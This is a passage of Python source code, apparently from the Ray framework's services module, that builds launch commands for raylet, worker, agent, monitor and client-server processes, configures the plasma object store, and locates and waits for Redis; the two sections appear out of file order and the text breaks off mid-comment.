f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] if redis_password: start_worker_command += [f"--redis-password={redis_password}"] # If the object manager port is None, then use 0 to cause the object # manager to choose its own port. if object_manager_port is None: object_manager_port = 0 if min_worker_port is None: min_worker_port = 0 if max_worker_port is None: max_worker_port = 0 # Create agent command agent_command = [ sys.executable, "-u", os.path.join(RAY_PATH, "new_dashboard/agent.py"), f"--node-ip-address={node_ip_address}", f"--redis-address={redis_address}", f"--metrics-export-port={metrics_export_port}", f"--dashboard-agent-port={metrics_agent_port}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", f"--temp-dir={temp_dir}", f"--session-dir={session_dir}", f"--runtime-env-dir={resource_dir}", f"--runtime-env-setup-hook={runtime_env_setup_hook}", f"--log-dir={log_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", ] if redis_password is not None and len(redis_password) != 0: agent_command.append("--redis-password={}".format(redis_password)) command = [ RAYLET_EXECUTABLE, f"--raylet_socket_name={raylet_name}", f"--store_socket_name={plasma_store_name}", f"--object_manager_port={object_manager_port}", f"--min_worker_port={min_worker_port}", f"--max_worker_port={max_worker_port}", f"--node_manager_port={node_manager_port}", f"--node_ip_address={node_ip_address}", f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--maximum_startup_concurrency={maximum_startup_concurrency}", f"--static_resource_list={resource_argument}", f"--python_worker_command={subprocess.list2cmdline(start_worker_command)}", # noqa f"--java_worker_command={subprocess.list2cmdline(java_worker_command)}", # noqa f"--cpp_worker_command={subprocess.list2cmdline(cpp_worker_command)}", # noqa f"--redis_password={redis_password or ""}", f"--temp_dir={temp_dir}", f"--session_dir={session_dir}", f"--resource_dir={resource_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--metrics_export_port={metrics_export_port}", f"--object_store_memory={object_store_memory}", f"--plasma_directory={plasma_directory}", ] if worker_port_list is not None: command.append(f"--worker_port_list={worker_port_list}") if start_initial_python_workers_for_first_job: command.append("--num_initial_python_workers_for_first_job={}".format( resource_spec.num_cpus)) command.append("--agent_command={}".format( subprocess.list2cmdline(agent_command))) if huge_pages: command.append("--huge_pages") if socket_to_use: socket_to_use.close() process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAYLET, use_valgrind=use_valgrind, use_gdb=False, use_valgrind_profiler=use_profiler, use_perftools_profiler=("RAYLET_PERFTOOLS_PATH" in os.environ), stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def get_ray_jars_dir(): """Return a directory where all ray-related jars and their dependencies locate.""" current_dir = RAY_PATH jars_dir = os.path.abspath(os.path.join(current_dir, "jars")) if not os.path.exists(jars_dir): raise RuntimeError("Ray jars is not packaged into ray. " "Please build ray with java enabled " "(set env var RAY_INSTALL_JAVA=1)") return os.path.abspath(os.path.join(current_dir, "jars")) def build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ): """This method assembles the command used to start a Java worker. Args: redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. redis_password (str): The password of connect to redis. session_dir (str): The path of this session. node_ip_address (str): The ip address for this node. Returns: The command string for starting Java worker. """ pairs = [] if redis_address is not None: pairs.append(("ray.address", redis_address)) pairs.append(("ray.raylet.node-manager-port", "RAY_NODE_MANAGER_PORT_PLACEHOLDER")) if plasma_store_name is not None: pairs.append(("ray.object-store.socket-name", plasma_store_name)) if raylet_name is not None: pairs.append(("ray.raylet.socket-name", raylet_name)) if redis_password is not None: pairs.append(("ray.redis.password", redis_password)) if node_ip_address is not None: pairs.append(("ray.node-ip", node_ip_address)) pairs.append(("ray.home", RAY_HOME)) pairs.append(("ray.logging.dir", os.path.join(session_dir, "logs"))) pairs.append(("ray.session-dir", session_dir)) command = ["java"] + ["-D{}={}".format(*pair) for pair in pairs] # Add ray jars path to java classpath ray_jars = os.path.join(get_ray_jars_dir(), "*") command += ["-cp", ray_jars] command += ["RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER"] command += ["io.ray.runtime.runner.worker.DefaultWorker"] return command def build_cpp_worker_command(cpp_worker_options, redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address): """This method assembles the command used to start a CPP worker. Args: cpp_worker_options (list): The command options for CPP worker. redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. redis_password (str): The password of connect to redis. session_dir (str): The path of this session. log_dir (str): The path of logs. node_ip_address (str): The ip address for this node. Returns: The command string for starting CPP worker. """ command = [ DEFAULT_WORKER_EXECUTABLE, f"--ray-plasma-store-socket-name={plasma_store_name}", f"--ray-raylet-socket-name={raylet_name}", "--ray-node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--ray-address={redis_address}", f"--ray-redis-password={redis_password}", f"--ray-session-dir={session_dir}", f"--ray-logs-dir={log_dir}", f"--ray-node-ip-address={node_ip_address}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] return command def determine_plasma_store_config(object_store_memory, plasma_directory=None, huge_pages=False): """Figure out how to configure the plasma object store. This will determine which directory to use for the plasma store. On Linux, we will try to use /dev/shm unless the shared memory file system is too small, in which case we will fall back to /tmp. If any of the object store memory or plasma directory parameters are specified by the user, then those values will be preserved. Args: object_store_memory (int): The object store memory to use. plasma_directory (str): The user-specified plasma directory parameter. huge_pages (bool): The user-specified huge pages parameter. Returns: The plasma directory to use. If it is specified by the user, then that value will be preserved. """ if not isinstance(object_store_memory, int): object_store_memory = int(object_store_memory) if huge_pages and not (sys.platform == "linux" or sys.platform == "linux2"): raise ValueError("The huge_pages argument is only supported on " "Linux.") system_memory = ray._private.utils.get_system_memory() # Determine which directory to use. By default, use /tmp on MacOS and # /dev/shm on Linux, unless the shared-memory file system is too small, # in which case we default to /tmp on Linux. if plasma_directory is None: if sys.platform == "linux" or sys.platform == "linux2": shm_avail = ray._private.utils.get_shared_memory_bytes() # Compare the requested memory size to the memory available in # /dev/shm. if shm_avail > object_store_memory: plasma_directory = "/dev/shm" elif (not os.environ.get("RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE") and object_store_memory > ray_constants.REQUIRE_SHM_SIZE_THRESHOLD): raise ValueError( "The configured object store size ({} GB) exceeds " "/dev/shm size ({} GB). This will harm performance. " "Consider deleting files in /dev/shm or increasing its " "size with " "--shm-size in Docker. To ignore this warning, " "set RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE=1.".format( object_store_memory / 1e9, shm_avail / 1e9)) else: plasma_directory = ray._private.utils.get_user_temp_dir() logger.warning( "WARNING: The object store is using {} instead of " "/dev/shm because /dev/shm has only {} bytes available. " "This will harm performance! You may be able to free up " "space by deleting files in /dev/shm. If you are inside a " "Docker container, you can increase /dev/shm size by " "passing '--shm-size={:.2f}gb' to 'docker run' (or add it " "to the run_options list in a Ray cluster config). Make " "sure to set this to more than 30% of available RAM.". format(ray._private.utils.get_user_temp_dir(), shm_avail, object_store_memory * (1.1) / (2**30))) else: plasma_directory = ray._private.utils.get_user_temp_dir() # Do some sanity checks. if object_store_memory > system_memory: raise ValueError( "The requested object store memory size is greater " "than the total available memory.") else: plasma_directory = os.path.abspath(plasma_directory) logger.info("object_store_memory is not verified when " "plasma_directory is set.") if not os.path.isdir(plasma_directory): raise ValueError(f"The file {plasma_directory} does not " "exist or is not a directory.") if huge_pages and plasma_directory is None: raise ValueError("If huge_pages is True, then the " "plasma_directory argument must be provided.") if object_store_memory < ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES: raise ValueError("Attempting to cap object store memory usage at {} " "bytes, but the minimum allowed is {} bytes.".format( object_store_memory, ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES)) # Print the object store memory using two decimal places. logger.debug( "Determine to start the Plasma object store with {} GB memory " "using {}.".format( round(object_store_memory / 10**9, 2), plasma_directory)) return plasma_directory, object_store_memory def start_worker(node_ip_address, object_store_name, raylet_name, redis_address, worker_path, temp_dir, raylet_ip_address=None, stdout_file=None, stderr_file=None, fate_share=None): """This method starts a worker process. Args: node_ip_address (str): The IP address of the node that this worker is running on. object_store_name (str): The socket name of the object store. raylet_name (str): The socket name of the raylet server. redis_address (str): The address that the Redis server is listening on. worker_path (str): The path of the source code which the worker process will run. temp_dir (str): The path of the temp dir. raylet_ip_address (str): The IP address of the worker's raylet. If not provided, it defaults to the node_ip_address. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. Returns: ProcessInfo for the process that was started. """ command = [ sys.executable, "-u", worker_path, "--node-ip-address=" + node_ip_address, "--object-store-name=" + object_store_name, "--raylet-name=" + raylet_name, "--redis-address=" + str(redis_address), "--temp-dir=" + temp_dir, ] if raylet_ip_address is not None: command.append("--raylet-ip-address=" + raylet_ip_address) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_WORKER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, autoscaling_config=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0, monitor_ip=None): """Run a process to monitor the other processes. Args: redis_address (str): The address that the Redis server is listening on. logs_dir(str): The path to the log directory. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. autoscaling_config: path to autoscaling config file. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. monitor_ip (str): IP address of the machine that the monitor will be run on. Can be excluded, but required for autoscaler metrics. Returns: ProcessInfo for the process that was started. """ monitor_path = os.path.join(RAY_PATH, AUTOSCALER_PRIVATE_DIR, "monitor.py") command = [ sys.executable, "-u", monitor_path, f"--logs-dir={logs_dir}", f"--redis-address={redis_address}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if autoscaling_config: command.append("--autoscaling-config=" + str(autoscaling_config)) if redis_password: command.append("--redis-password=" + redis_password) if monitor_ip: command.append("--monitor-ip=" + monitor_ip) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_ray_client_server(redis_address, ray_client_server_port, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, server_type: str = "proxy", serialized_runtime_env: Optional[str] = None, session_dir: Optional[str] = None): """Run the server process of the Ray client. Args: ray_client_server_port (int): Port the Ray client server listens on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. server_type (str): Whether to start the proxy version of Ray Client. serialized_runtime_env (str|None): If specified, the serialized runtime_env to start the client server in. Returns: ProcessInfo for the process that was started. """ root_ray_dir = Path(__file__).resolve().parents[1] setup_worker_path = os.path.join(root_ray_dir, "workers", ray_constants.SETUP_WORKER_FILENAME) conda_shim_flag = ( "--worker-setup-hook=" + ray_constants.DEFAULT_WORKER_SETUP_HOOK) command = [ sys.executable, setup_worker_path, conda_shim_flag, # These two args are to use the shim process. "-m", "ray.util.client.server", "--redis-address=" + str(redis_address), "--port=" + str(ray_client_server_port), "--mode=" + server_type ] if redis_password: command.append("--redis-password=" + redis_password) if serialized_runtime_env: command.append("--serialized-runtime-env=" + serialized_runtime_env) if session_dir: command.append(f"--session-dir={session_dir}") process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAY_CLIENT_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info
import base64 import collections import errno import io import json import logging import multiprocessing import os from pathlib import Path import mmap import random import shutil import signal import socket import subprocess import sys import time from typing import Optional # Ray modules import ray import ray.ray_constants as ray_constants import redis # Import psutil and colorama after ray so the packaged version is used. import colorama import psutil resource = None if sys.platform != "win32": import resource EXE_SUFFIX = ".exe" if sys.platform == "win32" else "" # True if processes are run in the valgrind profiler. RUN_RAYLET_PROFILER = False # Location of the redis server and module. RAY_HOME = os.path.join(os.path.dirname(os.path.dirname(__file__)), "../..") RAY_PATH = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) RAY_PRIVATE_DIR = "_private" AUTOSCALER_PRIVATE_DIR = "autoscaler/_private" REDIS_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/thirdparty/redis/src/redis-server" + EXE_SUFFIX) REDIS_MODULE = os.path.join( RAY_PATH, "core/src/ray/gcs/redis_module/libray_redis_module.so") # Location of the raylet executables. RAYLET_EXECUTABLE = os.path.join(RAY_PATH, "core/src/ray/raylet/raylet" + EXE_SUFFIX) GCS_SERVER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/gcs/gcs_server" + EXE_SUFFIX) # Location of the cpp default worker executables. DEFAULT_WORKER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/cpp/default_worker" + EXE_SUFFIX) # Logger for this module. It should be configured at the entry point # into the program using Ray. Ray provides a default configuration at # entry/init points. logger = logging.getLogger(__name__) ProcessInfo = collections.namedtuple("ProcessInfo", [ "process", "stdout_file", "stderr_file", "use_valgrind", "use_gdb", "use_valgrind_profiler", "use_perftools_profiler", "use_tmux", ]) def serialize_config(config): return base64.b64encode(json.dumps(config).encode("utf-8")).decode("utf-8") class ConsolePopen(subprocess.Popen): if sys.platform == "win32": def terminate(self): if isinstance(self.stdin, io.IOBase): self.stdin.close() if self._use_signals: self.send_signal(signal.CTRL_BREAK_EVENT) else: super(ConsolePopen, self).terminate() def __init__(self, *args, **kwargs): # CREATE_NEW_PROCESS_GROUP is used to send Ctrl+C on Windows: # https://docs.python.org/3/library/subprocess.html#subprocess.Popen.send_signal new_pgroup = subprocess.CREATE_NEW_PROCESS_GROUP flags_to_add = 0 if ray._private.utils.detect_fate_sharing_support(): # If we don't have kernel-mode fate-sharing, then don't do this # because our children need to be in out process group for # the process reaper to properly terminate them. flags_to_add = new_pgroup flags_key = "creationflags" if flags_to_add: kwargs[flags_key] = (kwargs.get(flags_key) or 0) | flags_to_add self._use_signals = (kwargs[flags_key] & new_pgroup) super(ConsolePopen, self).__init__(*args, **kwargs) def address(ip_address, port): return ip_address + ":" + str(port) def new_port(lower_bound=10000, upper_bound=65535, denylist=None): if not denylist: denylist = set() port = random.randint(lower_bound, upper_bound) retry = 0 while port in denylist: if retry > 100: break port = random.randint(lower_bound, upper_bound) retry += 1 if retry > 100: raise ValueError("Failed to find a new port from the range " f"{lower_bound}-{upper_bound}. Denylist: {denylist}") return port def find_redis_address(address=None): """ Attempts to find all valid Ray redis addresses on this node. Returns: Set of detected Redis instances. """ # Currently, this extracts the deprecated --redis-address from the command # that launched the raylet running on this node, if any. Anyone looking to # edit this function should be warned that these commands look like, for # example: # /usr/local/lib/python3.8/dist-packages/ray/core/src/ray/raylet/raylet # --redis_address=123.456.78.910 --node_ip_address=123.456.78.910 # --raylet_socket_name=... --store_socket_name=... --object_manager_port=0 # --min_worker_port=10000 --max_worker_port=10999 # --node_manager_port=58578 --redis_port=6379 # --maximum_startup_concurrency=8 # --static_resource_list=node:123.456.78.910,1.0,object_store_memory,66 # --config_list=plasma_store_as_thread,True # --python_worker_command=/usr/bin/python # /usr/local/lib/python3.8/dist-packages/ray/workers/default_worker.py # --redis-address=123.456.78.910:6379 # --node-ip-address=123.456.78.910 --node-manager-port=58578 # --object-store-name=... --raylet-name=... # --temp-dir=/tmp/ray # --metrics-agent-port=41856 --redis-password=[MASKED] # --java_worker_command= --cpp_worker_command= # --redis_password=[MASKED] --temp_dir=/tmp/ray --session_dir=... # --metrics-agent-port=41856 --metrics_export_port=64229 # --agent_command=/usr/bin/python # -u /usr/local/lib/python3.8/dist-packages/ray/new_dashboard/agent.py # --redis-address=123.456.78.910:6379 --metrics-export-port=64229 # --dashboard-agent-port=41856 --node-manager-port=58578 # --object-store-name=... --raylet-name=... --temp-dir=/tmp/ray # --log-dir=/tmp/ray/session_2020-11-08_14-29-07_199128_278000/logs # --redis-password=[MASKED] --object_store_memory=5037192806 # --plasma_directory=/tmp # Longer arguments are elided with ... but all arguments from this instance # are included, to provide a sense of what is in these. # Indeed, we had to pull --redis-address to the front of each call to make # this readable. # As you can see, this is very long and complex, which is why we can't # simply extract all the the arguments using regular expressions and # present a dict as if we never lost track of these arguments, for # example. Picking out --redis-address below looks like it might grab the # wrong thing, but double-checking that we're finding the correct process # by checking that the contents look like we expect would probably be prone # to choking in unexpected ways. # Notice that --redis-address appears twice. This is not a copy-paste # error; this is the reason why the for loop below attempts to pick out # every appearance of --redis-address. # The --redis-address here is what is now called the --address, but it # appears in the default_worker.py and agent.py calls as --redis-address. pids = psutil.pids() redis_addresses = set() for pid in pids: try: proc = psutil.Process(pid) # HACK: Workaround for UNIX idiosyncrasy # Normally, cmdline() is supposed to return the argument list. # But it in some cases (such as when setproctitle is called), # an arbitrary string resembling a command-line is stored in # the first argument. # Explanation: https://unix.stackexchange.com/a/432681 # More info: https://github.com/giampaolo/psutil/issues/1179 cmdline = proc.cmdline() # NOTE(kfstorm): To support Windows, we can't use # `os.path.basename(cmdline[0]) == "raylet"` here. if len(cmdline) > 0 and "raylet" in os.path.basename(cmdline[0]): for arglist in cmdline: # Given we're merely seeking --redis-address, we just split # every argument on spaces for now. for arg in arglist.split(" "): # TODO(ekl): Find a robust solution for locating Redis. if arg.startswith("--redis-address="): proc_addr = arg.split("=")[1] if address is not None and address != proc_addr: continue redis_addresses.add(proc_addr) except psutil.AccessDenied: pass except psutil.NoSuchProcess: pass return redis_addresses def get_ray_address_to_use_or_die(): """ Attempts to find an address for an existing Ray cluster if it is not already specified as an environment variable. Returns: A string to pass into `ray.init(address=...)` """ return os.environ.get(ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE, find_redis_address_or_die()) def find_redis_address_or_die(): redis_addresses = find_redis_address() if len(redis_addresses) > 1: raise ConnectionError( f"Found multiple active Ray instances: {redis_addresses}. " "Please specify the one to connect to by setting `address`.") sys.exit(1) elif not redis_addresses: raise ConnectionError( "Could not find any running Ray instance. " "Please specify the one to connect to by setting `address`.") return redis_addresses.pop() def wait_for_node(redis_address, node_plasma_store_socket_name, redis_password=None, timeout=30): """Wait until this node has appeared in the client table. Args: redis_address (str): The redis address. node_plasma_store_socket_name (str): The plasma_store_socket_name for the given node which we wait for. redis_password (str): the redis password. timeout: The amount of time in seconds to wait before raising an exception. Raises: TimeoutError: An exception is raised if the timeout expires before the node appears in the client table. """ redis_ip_address, redis_port = redis_address.split(":") wait_for_redis_to_start(redis_ip_address, redis_port, redis_password) global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) start_time = time.time() while time.time() - start_time < timeout: clients = global_state.node_table() object_store_socket_names = [ client["ObjectStoreSocketName"] for client in clients ] if node_plasma_store_socket_name in object_store_socket_names: return else: time.sleep(0.1) raise TimeoutError("Timed out while waiting for node to startup.") def get_node_to_connect_for_driver(redis_address, node_ip_address, redis_password=None): redis_ip_address, redis_port = redis_address.split(":") # Get node table from global state accessor. global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) return global_state.get_node_to_connect_for_driver(node_ip_address) def get_webui_url_from_redis(redis_client): webui_url = redis_client.hmget("webui", "url")[0] return ray._private.utils.decode( webui_url) if webui_url is not None else None def remaining_processes_alive(): """See if the remaining processes are alive or not. Note that this ignores processes that have been explicitly killed, e.g., via a command like node.kill_raylet(). Returns: True if the remaining processes started by ray.init() are alive and False otherwise. Raises: Exception: An exception is raised if the processes were not started by ray.init(). """ if ray.worker._global_node is None: raise RuntimeError("This process is not in a position to determine " "whether all processes are alive or not.") return ray.worker._global_node.remaining_processes_alive() def validate_redis_address(address): """Validates address parameter. Returns: redis_address: string containing the full <host:port> address. redis_ip: string representing the host portion of the address. redis_port: integer representing the port portion of the address. """ if address == "auto": address = find_redis_address_or_die() redis_address = address_to_ip(address) redis_address_parts = redis_address.split(":") if len(redis_address_parts) != 2: raise ValueError("Malformed address. Expected '<host>:<port>'.") redis_ip = redis_address_parts[0] try: redis_port = int(redis_address_parts[1]) except ValueError: raise ValueError("Malformed address port. Must be an integer.") if redis_port < 1024 or redis_port > 65535: raise ValueError("Invalid address port. Must " "be between 1024 and 65535.") return redis_address, redis_ip, redis_port def address_to_ip(address): """Convert a hostname to a numerical IP addresses in an address. This should be a no-op if address already contains an actual numerical IP address. Args: address: This can be either a string containing a hostname (or an IP address) and a port or it can be just an IP address. Returns: The same address but with the hostname replaced by a numerical IP address. """ address_parts = address.split(":") ip_address = socket.gethostbyname(address_parts[0]) # Make sure localhost isn't resolved to the loopback ip if ip_address == "127.0.0.1": ip_address = get_node_ip_address() return ":".join([ip_address] + address_parts[1:]) def node_ip_address_from_perspective(address): """IP address by which the local node can be reached *from* the `address`. Args: address (str): The IP address and port of any known live service on the network you care about. Returns: The IP address by which the local node can be reached from the address. """ ip_address, port = address.split(":") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # This command will raise an exception if there is no internet # connection. s.connect((ip_address, int(port))) node_ip_address = s.getsockname()[0] except OSError as e: node_ip_address = "127.0.0.1" # [Errno 101] Network is unreachable if e.errno == errno.ENETUNREACH: try: # try get node ip address from host name host_name = socket.getfqdn(socket.gethostname()) node_ip_address = socket.gethostbyname(host_name) except Exception: pass finally: s.close() return node_ip_address def get_node_ip_address(address="8.8.8.8:53"): if ray.worker._global_node is not None: return ray.worker._global_node.node_ip_address return node_ip_address_from_perspective(address) def create_redis_client(redis_address, password=None): """Create a Redis client. Args: The IP address, port, and password of the Redis server. Returns: A Redis client. """ redis_ip_address, redis_port = redis_address.split(":") # For this command to work, some other client (on the same machine # as Redis) must have run "CONFIG SET protected-mode no". return redis.StrictRedis( host=redis_ip_address, port=int(redis_port), password=password) def start_ray_process(command, process_type, fate_share, env_updates=None, cwd=None, use_valgrind=False, use_gdb=False, use_valgrind_profiler=False, use_perftools_profiler=False, use_tmux=False, stdout_file=None, stderr_file=None, pipe_stdin=False): """Start one of the Ray processes. TODO(rkn): We need to figure out how these commands interact. For example, it may only make sense to start a process in gdb if we also start it in tmux. Similarly, certain combinations probably don't make sense, like simultaneously running the process in valgrind and the profiler. Args: command (List[str]): The command to use to start the Ray process. process_type (str): The type of the process that is being started (e.g., "raylet"). fate_share: If true, the child will be killed if its parent (us) dies. True must only be passed after detection of this functionality. env_updates (dict): A dictionary of additional environment variables to run the command with (in addition to the caller's environment variables). cwd (str): The directory to run the process in. use_valgrind (bool): True if we should start the process in valgrind. use_gdb (bool): True if we should start the process in gdb. use_valgrind_profiler (bool): True if we should start the process in the valgrind profiler. use_perftools_profiler (bool): True if we should profile the process using perftools. use_tmux (bool): True if we should start the process in tmux. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. pipe_stdin: If true, subprocess.PIPE will be passed to the process as stdin. Returns: Information about the process that was started including a handle to the process that was started. """ # Detect which flags are set through environment variables. valgrind_env_var = f"RAY_{process_type.upper()}_VALGRIND" if os.environ.get(valgrind_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_env_var) use_valgrind = True valgrind_profiler_env_var = f"RAY_{process_type.upper()}_VALGRIND_PROFILER" if os.environ.get(valgrind_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_profiler_env_var) use_valgrind_profiler = True perftools_profiler_env_var = (f"RAY_{process_type.upper()}" "_PERFTOOLS_PROFILER") if os.environ.get(perftools_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", perftools_profiler_env_var) use_perftools_profiler = True tmux_env_var = f"RAY_{process_type.upper()}_TMUX" if os.environ.get(tmux_env_var) == "1": logger.info("Detected environment variable '%s'.", tmux_env_var) use_tmux = True gdb_env_var = f"RAY_{process_type.upper()}_GDB" if os.environ.get(gdb_env_var) == "1": logger.info("Detected environment variable '%s'.", gdb_env_var) use_gdb = True if sum([ use_gdb, use_valgrind, use_valgrind_profiler, use_perftools_profiler, ]) > 1: raise ValueError( "At most one of the 'use_gdb', 'use_valgrind', " "'use_valgrind_profiler', and 'use_perftools_profiler' flags can " "be used at a time.") if env_updates is None: env_updates = {} if not isinstance(env_updates, dict): raise ValueError("The 'env_updates' argument must be a dictionary.") modified_env = os.environ.copy() modified_env.update(env_updates) if use_gdb: if not use_tmux: raise ValueError( "If 'use_gdb' is true, then 'use_tmux' must be true as well.") # TODO(suquark): Any better temp file creation here? gdb_init_path = os.path.join(ray._private.utils.get_ray_temp_dir(), f"gdb_init_{process_type}_{time.time()}") ray_process_path = command[0] ray_process_args = command[1:] run_args = " ".join(["'{}'".format(arg) for arg in ray_process_args]) with open(gdb_init_path, "w") as gdb_init_file: gdb_init_file.write(f"run {run_args}") command = ["gdb", ray_process_path, "-x", gdb_init_path] if use_valgrind: command = [ "valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--leak-check-heuristics=stdstring", "--error-exitcode=1", ] + command if use_valgrind_profiler: command = ["valgrind", "--tool=callgrind"] + command if use_perftools_profiler: modified_env["LD_PRELOAD"] = os.environ["PERFTOOLS_PATH"] modified_env["CPUPROFILE"] = os.environ["PERFTOOLS_LOGFILE"] if use_tmux: # The command has to be created exactly as below to ensure that it # works on all versions of tmux. (Tested with tmux 1.8-5, travis' # version, and tmux 2.1) command = ["tmux", "new-session", "-d", f"{' '.join(command)}"] if fate_share: assert ray._private.utils.detect_fate_sharing_support(), ( "kernel-level fate-sharing must only be specified if " "detect_fate_sharing_support() has returned True") def preexec_fn(): import signal signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGINT}) if fate_share and sys.platform.startswith("linux"): ray._private.utils.set_kill_on_parent_death_linux() win32_fate_sharing = fate_share and sys.platform == "win32" # With Windows fate-sharing, we need special care: # The process must be added to the job before it is allowed to execute. # Otherwise, there's a race condition: the process might spawn children # before the process itself is assigned to the job. # After that point, its children will not be added to the job anymore. CREATE_SUSPENDED = 0x00000004 # from Windows headers process = ConsolePopen( command, env=modified_env, cwd=cwd, stdout=stdout_file, stderr=stderr_file, stdin=subprocess.PIPE if pipe_stdin else None, preexec_fn=preexec_fn if sys.platform != "win32" else None, creationflags=CREATE_SUSPENDED if win32_fate_sharing else 0) if win32_fate_sharing: try: ray._private.utils.set_kill_child_on_death_win32(process) psutil.Process(process.pid).resume() except (psutil.Error, OSError): process.kill() raise def _get_stream_name(stream): if stream is not None: try: return stream.name except AttributeError: return str(stream) return None return ProcessInfo( process=process, stdout_file=_get_stream_name(stdout_file), stderr_file=_get_stream_name(stderr_file), use_valgrind=use_valgrind, use_gdb=use_gdb, use_valgrind_profiler=use_valgrind_profiler, use_perftools_profiler=use_perftools_profiler, use_tmux=use_tmux) def wait_for_redis_to_start(redis_ip_address, redis_port, password=None): """Wait for a Redis server to be available. This is accomplished by creating a Redis client and sending a random command to the server until the command gets through. Args: redis_ip_address (str): The IP address of the redis server. redis_port (int): The port of the redis server. password (str): The password of the redis server. Raises: Exception: An exception is raised if we could not connect with Redis. """ redis_client = redis.StrictRedis( host=redis_ip_address, port=redis_port, password=password) # Wait for the Redis server to start. num_retries = ray_constants.START_REDIS_WAIT_RETRIES delay = 0.001 for i in range(num_retries): try: # Run some random command and see if it worked. logger.debug( "Waiting for redis server at {}:{} to respond...".format( redis_ip_address, redis_port)) redis_client.client_list() # If the Redis service is delayed getting set up for any reason, we may # get a redis.ConnectionError: Error 111 connecting to host:port. # Connection refused. # Unfortunately, redis.ConnectionError is also the base class of # redis.AuthenticationError. We *don't* want to obscure a # redis.AuthenticationError, because that indicates the user provided a # bad password. Thus a double except clause to ensure a # redis.AuthenticationError isn't trapped here. except redis.AuthenticationError as authEx: raise RuntimeError("Unable to connect to Redis at {}:{}.".format( redis_ip_address, redis_port)) from authEx except redis.ConnectionError as connEx: if i >= num_retries - 1: raise RuntimeError( f"Unable to connect to Redis at {redis_ip_address}:" f"{redis_port} after {num_retries} retries. Check that " f"{redis_ip_address}:{redis_port} is reachable from this " "machine. If it is not, your firewall may be blocking " "this port. If the problem is a flaky connection, try " "setting the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of" " attempts to ping the Redis server.") from connEx # Wait a little bit. time.sleep(delay) delay *= 2 else: break else: raise RuntimeError( f"Unable to connect to Redis (after {num_retries} retries). " "If the Redis instance is on a different machine, check that " "your firewall and relevant Ray ports are configured properly. " "You can also set the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of " "attempts to ping the Redis server.") def _compute_version_info(): """Compute the versions of Python, and Ray. Returns: A tuple containing the version information. """ ray_version = ray.__version__ python_version = ".".join(map(str, sys.version_info[:3])) return ray_version, python_version def _put_version_info_in_redis(redis_client): """Store version information in Redis. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. Args: redis_client: A client for the primary Redis shard. """ redis_client.set("VERSION_INFO", json.dumps(_compute_version_info())) def check_version_info(redis_client): """Check if various version info of this process is correct. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. If the version information is not present in Redis, then no check is done. Args: redis_client: A client for the primary Redis shard. Raises: Exception: An exception is raised if there is a version mismatch. """ redis_reply = redis_client.get("VERSION_INFO") # Don't do the check if there is no 